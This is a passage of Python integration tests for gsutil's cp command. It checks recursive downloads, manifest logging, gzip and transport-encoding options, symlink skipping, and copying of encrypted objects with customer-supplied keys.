for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_copy_quiet(self):
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
Note that while this does perform a file to object upload, MD5's are
not supported for composite objects so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
# For Python 2 compatability.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
# calculate the MD5 hash. Since RunGsUtil is overriden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
# fpath_bytes = fpath.encode(UTF8)
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
# Note: We originally one time implemented a test
# (test_copy_invalid_unicode_filename) that invalid unicode filenames were
# skipped, but it turns out os.walk() on macOS doesn't have problems with
# such files (so, failed that test). Given that, we decided to remove the
# test.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
# Test that copying specifying only 2 of the 3 prefixes gzips the correct
# files, and test that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
contents: Byte string that are stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and test the behavior of non-resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
This test generates a large amount of data (e.g. halt_size amount of chars)
to upload. Due to the large size, it will be above the resumable threshold,
and test the behavior of resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
cases = (['cp', '-Z', '-j', 'html, js', 'a.js',
'b.js'], ['cp', '-J', '-z', 'html, js', 'a.js',
'b.js'], ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
def test_upload_with_subdir_and_unexpanded_wildcard(self):
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
self.assertEquals('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(tmpdir, 'missing'))
# Create a blank directory that is a broken symlink to ensure that we
# don't fail recursive enumeration with a bad symlink.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'cp', '-e', '-c',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
# Contents should be not duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
